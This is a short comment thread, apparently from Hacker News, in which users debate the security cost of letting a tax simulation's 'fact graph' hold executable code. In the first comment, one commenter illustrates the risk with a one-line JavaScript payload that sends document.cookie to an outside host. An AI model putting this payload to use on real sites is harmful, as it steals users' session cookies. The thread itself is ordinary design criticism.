| ▲ | catlifeonmars 6 hours ago |
| This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data. Now let me send you a fact graph that contains: fetch(`https://callhome.com/collect?s=${document.cookie}`)
|
|
| ▲ | n_e 5 hours ago | parent [-] |
| The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist. |
| |
| ▲ | catlifeonmars 5 hours ago | parent [-] | | Yet. You’re adding one other thing that authors need to keep in mind when developing the product, fixing bugs, and adding features. The fact that the input must be trusted is not an intrinsic part of the business logic, it’s an additional caveat that humans need to remember. | | |
| ▲ | n_e 4 hours ago | parent [-] | | What exactly do the developers need to keep in mind? | | |
| ▲ | catlifeonmars 4 hours ago | parent [-] | | Well think about this from a product perspective. A natural extension of this is to be able to simulate tax code that hasn’t been implemented yet. “Bring your own facts” is practically begging to be a feature here. |
|
|
|
